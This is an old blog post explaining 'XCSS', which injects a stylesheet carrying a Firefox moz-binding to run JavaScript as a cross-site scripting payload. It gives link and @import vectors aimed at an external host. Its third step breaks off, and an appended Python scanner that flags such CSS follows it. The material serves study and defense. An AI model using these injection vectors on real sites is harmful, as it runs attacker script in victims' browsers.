XCSS
Published 18 years 4 months ago • Last updated March 22, 2025
I thought I'd continue the theme of experimenting with XSS and trying different things. I haven't seen this written about anywhere, so here goes. The idea is to use CSS as an XSS payload, which can be useful when filters allow some things but make it difficult to construct an attack.
I've decided to call it XCSS (Cross site Cascading Style Sheets). There are many ways you can inject a style sheet into a document; I'll show how to do it in Firefox, but it will be possible with other browsers as well.
Step 1 - A moz binding document
We first need a moz binding document to demonstrate this method; a sample one can be found here: Moz Binding sample. I'm not going to explain the details of what one can do, so if you want to find out more then just Google it. This example simply injects a JavaScript alert.
Step 2 - Embedding the style
There are many ways of embedding a stylesheet into a document, here I'll show you three.
1. <pre lang="html"><link href="//businessinfo.co.uk/labs/xbl/xbl.xml#xss" rel="stylesheet" type="text/css" /></pre>
2. <pre lang="html"><style type="text/css">@import url("//businessinfo.co.uk/labs/xcss/xcss.css");</style></pre>
3. Finally, using JavaScript to add a rule to an existing style sheet:-
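Seen from the filter's side, the first two embeddings above arrive as a `<link rel="stylesheet">` or a `<style>` block, and a binding can also sit in an inline `style` attribute, so an HTML filter has to treat all of these as script-capable. The following Python scanner is an added example, not code from the original post; the `scan` function, the finding labels, the deny-list and the `example.test` fragments are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Strict deny-list (an assumption of this example): CSS that imports, binds or
# references a URL. Comments and backslashes are dropped before matching; hex
# escapes are not decoded, so a clean result is not proof of safety.
RISKY_CSS = re.compile(r"@import|-moz-binding|url\s*\(", re.IGNORECASE)
CSS_NOISE = re.compile(r"/\*.*?\*/|\\", re.DOTALL)

# Constructed sample fragments (example.test is a placeholder host).
SAMPLES = [
    '<link href="//example.test/a.css" rel="stylesheet" type="text/css" />',
    '<style type="text/css">@import url("//example.test/a.css");</style>',
    '<p style="-moz-binding:url(//example.test/b.xml#x)">hi</p>',
    '<p style="color:red">plain styling</p>',
]

class StyleVectorScanner(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []
        self.style_buf = None  # text chunks collected while inside <style>

    def check_css(self, css, where):
        if RISKY_CSS.search(CSS_NOISE.sub("", css)):
            self.findings.append(where)

    def handle_starttag(self, tag, attrs):
        attrs = {name: (value or "") for name, value in attrs}
        if tag == "link" and "stylesheet" in attrs.get("rel", "").lower().split():
            self.findings.append("link-stylesheet")
        elif tag == "style":
            self.style_buf = []
        if "style" in attrs:
            self.check_css(attrs["style"], "style-attribute")

    def handle_endtag(self, tag):
        if tag == "style" and self.style_buf is not None:
            self.check_css("".join(self.style_buf), "style-block")
            self.style_buf = None

    def handle_data(self, data):
        if self.style_buf is not None:
            self.style_buf.append(data)

def scan(html):
    scanner = StyleVectorScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings
```

`scan()` returns one label per finding, so an empty list means none of the deny-listed constructs was seen in that fragment.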
